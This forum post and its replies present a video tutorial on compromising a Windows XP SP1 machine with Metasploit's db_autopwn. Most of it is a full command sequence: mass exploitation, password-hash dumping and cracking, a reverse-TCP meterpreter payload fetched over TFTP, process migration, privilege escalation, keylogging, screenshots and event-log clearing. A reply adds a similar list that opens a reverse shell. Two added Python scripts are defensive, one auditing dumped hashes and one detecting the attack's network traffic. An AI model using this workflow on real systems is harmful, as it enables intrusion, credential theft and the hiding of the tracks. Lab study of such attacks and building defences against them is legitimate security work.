[Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)
Links
Watch video on-line: http://g0tmi1k.blip.tv/file/4644349/
Download video: http://www.mediafire.com/?cyxtis1ymly84f5
What is this?
This guide shows how to set up PostgreSQL as the database behind Metasploit, then uses Metasploit's db_autopwn feature to run a collection of remote exploits in an attempt to gain access to the target system(s). If access is gained, it shows a few basic things afterwards, such as:
- Gathering information – OS, interfaces, privilege level, running processes, idle time, screenshots and keylogging
- Cracking users' passwords – Finding passwords to access the system
- Gaining shell access – Then transferring the meterpreter agent via TFTP
- Handling multiple sessions – Choosing which session to interact with
- Process migration – Moving the code into another process
- Privilege escalation – Attempting to gain SYSTEM level privileges
- File management – Navigation, download/upload, editing and viewing files/folders
- Program control – Executing and killing programs
- Misc – Covering tracks and power management
Guide
- Configure the PostgreSQL database so it works with Metasploit
- Set up Metasploit to use PostgreSQL, and connect automatically at startup
- Use nmap from within Metasploit to scan for target(s)
- Run db_autopwn to try a collection of remote exploits against the discovered target(s) (the two exploits that worked were windows/smb/ms04_011_lsass and windows/dcerpc/ms03_026_dcom)
- Dump the hash table, then crack the password(s) with John the Ripper
- Use TFTP instead of meterpreter to transfer files (useful if you only have shell access and want a meterpreter shell instead, or want to interact with another system)
- Migrate to a different process, which hides the backdoor from running process lists (makes the injection less obvious and allows the backdoor file to be deleted if needed; also, if the exploited service had no interactive access to the desktop, it now does)
- Escalate privileges, giving the attacker more control over the system
- Various commands to navigate the file system and alter its structure
- Basic commands to collect information about the system and user
What do I need?
- PostgreSQL – (Can be found on BackTrack 4-R2)
- Metasploit – (Can be found on BackTrack 4-R2)
- Nmap – (Can be found on BackTrack 4-R2)
- TFTPD – (Can be found on BackTrack 4-R2)
- Text Editor – (Kate can be found on BackTrack 4-R2)
Commands:
Code:
# --- PostgreSQL: start the service and give the postgres role a password ---
/etc/init.d/postgresql-8.3 start
/etc/init.d/postgresql-8.3 status
passwd -d postgres    # clear the UNIX password so "su postgres" does not prompt
su postgres
psql
ALTER USER postgres WITH PASSWORD 'g0tmi1k';
\q
passwd    # set a UNIX password for the postgres account again
psql -l
createdb msf
psql -l
exit
clear
# --- Metasploit: select the PostgreSQL driver and connect to the msf database ---
msfconsole
db_driver
db_driver postgresql
db_connect postgres:g0tmi1k@127.0.0.1/msf
exit
# --- Connect automatically at startup: put the same commands in msfconsole.rc ---
kate ~/.msf3/msfconsole.rc
db_driver postgresql
db_connect postgres:g0tmi1k@127.0.0.1/msf
db_workspace -a msf
clear
# --- Scan for targets and run db_autopwn against what was found ---
msfconsole
db_hosts
db_nmap -O -sS -sV -v 192.168.0.100-110    #192.168.0.0/24 -A
db_hosts
db_autopwn -t -p -e -b    #db_autopwn -t -x -e -r -T 30
clear
# --- Interact with a session, gather information and dump the hashes ---
sessions -l -v
sessions -i 1
sysinfo
ipconfig
getuid
hashdump
kate -> paste -> Save: ~/hashdump    # save the hashdump output to a file
cd /pentest/passwords/jtr/
./john ~/hashdump
clear
# --- Build a meterpreter payload, serve it over TFTP and catch it with multi/handler ---
start-tftpd
cd /tmp
ifconfig
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.0.33 X > g0tmi1k.exe
ls
background
clear
search handler
use multi/handler
show options
exploit -j
sessions -i 1
shell
cd C:\
tftp -i 192.168.0.105 GET g0tmi1k.exe    # XP's built-in TFTP client; -i = binary (octet) mode
g0tmi1k.exe
exit
# --- Process migration and privilege escalation in the new session ---
sessions -l -v
sessions -i 3
getuid
ps
migrate <PID of Explorer.EXE>    # PID taken from the ps output
getuid
getsystem    #getprivs if not enabled, migrate if that fails - and try again
getuid
# --- File management ---
pwd
cd C:/
ls
mkdir g0tmi1k
ls
cd g0tmi1k
ls
pwd
getwd
lpwd
echo have you... > /tmp/message.txt    # create the file in a local shell on the attacking machine
upload /tmp/message.txt C:/g0tmi1k/
ls
edit message.txt
A -> g0tmi1k? -> esc -> :wq    # vi keystrokes inside meterpreter's edit command
cat C:/g0tmi1k/message.txt
download message.txt /tmp/
execute -f notepad -a message.txt
del message.txt
ls
cd \
ls
rmdir g0tmi1k
ls
# --- Program control, information gathering and covering tracks ---
ps
kill <PID of notepad.exe>    # PID taken from the ps output
idletime
screenshot
run keylogrecorder
mail.google.com thisismyusername thisismypassword    # sample keystrokes made on the target while the keylogger runs
clearev
shutdown
exit
kate -> open -> /path/to/key/logger/file/which/    # view the captured keystrokes
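hashdump prints the local SAM in pwdump format (user:RID:LM hash:NT hash:::), which is what john reads in the commands above. The same lines also tell a defender why the cracking step is so quick on an XP box: an LM hash is stored for every account unless the NoLMHash policy is set, and its second half is the fixed value aad3b435b51404ee whenever the password is seven characters or fewer. The Python audit below is an added example written for this page, not code from the video or from Metasploit; the hash values in the sample dump are made-up placeholders, not hashes of any real password.

```python
"""Added example (not from the original post): audit a pwdump-format dump,
the format hashdump prints and john reads, for weak credential storage.
The sample hashes are made-up placeholders, not hashes of any real password."""

# Well-known constants: the LM hash of the empty password (two identical
# halves, since each half is DES of a fixed string under a null key) and
# the NT hash of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_LM_HALF = EMPTY_LM[:16]
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample dump in pwdump layout: user:RID:LM hash:NT hash:::
SAMPLE_DUMP = """\
Administrator:500:11223344556677889900aabbccddeeff:0f0e0d0c0b0a09080706050403020100:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1003:1122334455667788aad3b435b51404ee:ffeeddccbbaa99887766554433221100:::
bob:1004:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
"""


def parse_pwdump(text):
    """Parse pwdump lines into dicts; raise ValueError on a malformed line."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            raise ValueError("not a pwdump line: %r" % line)
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            raise ValueError("hash is not 32 hex characters: %r" % line)
        entries.append({"user": parts[0], "rid": int(parts[1]), "lm": lm, "nt": nt})
    return entries


def audit(entries):
    """Map user -> list of findings; users with nothing to report are omitted."""
    findings = {}
    for e in entries:
        issues = []
        if e["nt"] == EMPTY_NT:
            issues.append("empty password")
        if e["lm"] != EMPTY_LM:
            # Any LM hash other than the empty one means LM storage is enabled
            # (NoLMHash not set), which is what makes the cracking step cheap.
            issues.append("LM hash stored")
            if e["lm"][16:] == EMPTY_LM_HALF:
                # The second half is the null-key constant whenever the
                # password fits entirely in the first 7-character block.
                issues.append("password is 7 characters or fewer")
        if issues:
            findings[e["user"]] = issues
    return findings


if __name__ == "__main__":
    for user, issues in audit(parse_pwdump(SAMPLE_DUMP)).items():
        print(user + ": " + ", ".join(issues))
```

On the sample, bob is the only account with nothing to report: his LM field is the empty constant while his NT hash is not, which is what a host with NoLMHash enabled looks like. Run over a real dump, the same two checks give a quick reading of how much of the password set john will recover in seconds rather than days.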
Notes:
- I had deleted postgres's password before recording the video. This is the reason why it didn't prompt me for "(current) UNIX password:". The solution would be to type "passwd -d postgres" before "su postgres". The commands have been updated to reflect this.
- Metasploit can do A LOT more – this is a brief insight to it
- db_autopwn may not work on your chosen target - Target in the video is running Windows XP SP1
- db_autopwn is “noisy” as it tries a mass of exploits.
- Windows XP by default has a TFTP client built into it, Windows 7 doesn't.
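The noise mentioned in the notes is also what gives this sequence away on the wire: a port sweep from one source, then a burst of connections to TCP 135 (the DCE/RPC endpoint ms03_026_dcom goes through) and TCP 445 (the SMB transport ms04_011_lsass uses), followed in this walkthrough by a TFTP pull over UDP 69 from the victim back to the attacking host. The Python script below is an added example written for this page, not code from the video or from Metasploit; the "timestamp proto src:port -> dst:port" log format, the hosts and the thresholds are all constructed assumptions.

```python
"""Added example (not from the original post): spot the network noise that a
db_nmap sweep followed by db_autopwn leaves behind, using constructed
connection-log lines.  Log format, hosts and thresholds are assumptions."""
import re
from collections import defaultdict
from datetime import datetime

# Ports the two exploits named on the page reach the target on:
# ms03_026_dcom via the DCE/RPC endpoint mapper (TCP 135),
# ms04_011_lsass via SMB (TCP 445).  TFTP (UDP 69) is the transfer
# channel the walkthrough uses to pull the payload onto the victim.
EXPLOIT_PORTS = {135, 445}
TFTP_PORT = 69

# Constructed sample log: "<ISO timestamp> <proto> <src>:<sport> -> <dst>:<dport>".
# 10.0.0.5 sweeps 10.0.0.20, hammers 135/445, then 10.0.0.20 pulls a file
# from it over TFTP.  10.0.0.7 is an ordinary file-share client for contrast,
# and 10.0.0.9 -> 10.0.0.8 is TFTP traffic unrelated to any scan.
SAMPLE_LOG = """\
2011-01-10T12:00:00 TCP 10.0.0.5:40001 -> 10.0.0.20:21
2011-01-10T12:00:00 TCP 10.0.0.5:40002 -> 10.0.0.20:22
2011-01-10T12:00:01 TCP 10.0.0.5:40003 -> 10.0.0.20:23
2011-01-10T12:00:01 TCP 10.0.0.5:40004 -> 10.0.0.20:25
2011-01-10T12:00:02 TCP 10.0.0.5:40005 -> 10.0.0.20:80
2011-01-10T12:00:02 TCP 10.0.0.5:40006 -> 10.0.0.20:110
2011-01-10T12:00:03 TCP 10.0.0.5:40007 -> 10.0.0.20:135
2011-01-10T12:00:03 TCP 10.0.0.5:40008 -> 10.0.0.20:139
2011-01-10T12:00:04 TCP 10.0.0.5:40009 -> 10.0.0.20:443
2011-01-10T12:00:04 TCP 10.0.0.5:40010 -> 10.0.0.20:445
2011-01-10T12:00:05 TCP 10.0.0.5:40011 -> 10.0.0.20:3389
2011-01-10T12:00:40 TCP 10.0.0.5:40012 -> 10.0.0.20:135
2011-01-10T12:00:41 TCP 10.0.0.5:40013 -> 10.0.0.20:445
2011-01-10T12:01:10 UDP 10.0.0.20:1034 -> 10.0.0.5:69
2011-01-10T12:05:00 TCP 10.0.0.7:50001 -> 10.0.0.20:445
2011-01-10T12:06:00 UDP 10.0.0.9:1035 -> 10.0.0.8:69
"""

LINE_RE = re.compile(r"^(\S+) (TCP|UDP) (\S+):(\d+) -> (\S+):(\d+)$")


def parse_log(text):
    """Return a list of (timestamp, proto, src_ip, dst_ip, dst_port) tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # ignore lines that are not in the assumed format
        ts, proto, src, _sport, dst, dport = m.groups()
        events.append((datetime.fromisoformat(ts), proto, src, dst, int(dport)))
    return events


def analyse(events, window_s=60, scan_ports=10, exploit_hits=3):
    """Return sorted (finding, src, dst) tuples.

    port_scan          one source touched >= scan_ports distinct TCP ports on
                       one host inside a window_s-second bucket
    exploit_burst      >= exploit_hits connections to 135/445 in one bucket
    tftp_from_scanner  a host that was scanned pulls over UDP 69 from its scanner
    """
    if not events:
        return []
    t0 = min(e[0] for e in events)
    buckets = defaultdict(list)  # (src, dst, bucket) -> [dst_port, ...]
    for ts, proto, src, dst, dport in events:
        if proto == "TCP":
            bucket = int((ts - t0).total_seconds() // window_s)
            buckets[(src, dst, bucket)].append(dport)
    findings, scanners = set(), set()
    for (src, dst, _b), ports in buckets.items():
        if len(set(ports)) >= scan_ports:
            findings.add(("port_scan", src, dst))
            scanners.add((src, dst))
        if sum(1 for p in ports if p in EXPLOIT_PORTS) >= exploit_hits:
            findings.add(("exploit_burst", src, dst))
    for ts, proto, src, dst, dport in events:
        # The victim is the UDP source here and the scanner is its destination.
        if proto == "UDP" and dport == TFTP_PORT and (dst, src) in scanners:
            findings.add(("tftp_from_scanner", src, dst))
    return sorted(findings)


if __name__ == "__main__":
    for finding in analyse(parse_log(SAMPLE_LOG)):
        print("%-18s %s -> %s" % finding)
```

The thresholds are deliberately loose: db_autopwn fires far more than three exploit modules at a host, and a -sV scan touches far more than ten ports, so the real signal is much louder than the sample. The TFTP rule is the one worth keeping even on networks where port scans are routine, because a workstation fetching a file from the host that just scanned it is rarely legitimate.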
Song: Luke Solomon – Liquid & Bungalove - Saturday Song
Video length: 10:28
Capture length: 25:01
Re: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)
Great video man, nice work too, keep it on.
Re: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)
Nice work man... XP systems are still being used nowadays... but I prefer facing Win7...
btw nice work boy
go fw
Re: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)
I found by chance a similar video, but with SP3, dunno if it's interesting...
http://www.youtube.com/watch?v=dKLWvGWA-Ow
From the Description Box:
How to own a Windows XP SP3 Box with Metasploit / Backtrack.
Tutorial: Metasploit DB Autopwning
Commands:
/etc/init.d/postgresql-8.3 start    # start the database
msfconsole                          # start metasploit
db_connect pentest                  # connect to database
db_nmap <host IP or hostname>       # scan for open ports
db_autopwn -e -p                    # -e = all matched targets, -p = select attacks based on open ports
Wait until a Meterpreter session opens, like:
[*] Meterpreter session 1 opened (10.0.0.128:44919 - 10.0.0.130:33411)
Wait until the attack is over, or press Ctrl+C to terminate the attack.
Now:
sessions          # shows your connections to the victim
sessions -i 1     # you join session 1
shell             # opens reverse shell on victim
Use the help function to get information about other available commands.
FOR EDUCATIONAL PURPOSES ONLY
Re: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)
Quote (originally posted by m4jh0l): Great video man, nice work too, keep it on.
Quote (originally posted by pusherman): Thanks for the tutorial.
Thanks for the feedback :)
Quote (originally posted by m0j4h3d): Nice work man... XP systems are still being used nowadays... but I prefer facing Win7...
btw nice work boy
go fw
Yes they are; however, XP SP1 is "rare".
I do plan to get to Windows 7 - just want to do a few OSs/SPs between then though ;)
Quote (originally posted by MartinBishop): Thanks for sharing. I've had a quick look at the video and on the target's machine they have got VNC installed...
In my demos it is a fresh install of the OS and SP, without any other software installed, using the default values. I'm not sure what exploit was used to create the session(s).
I am soon recording my take on XP SP3. :)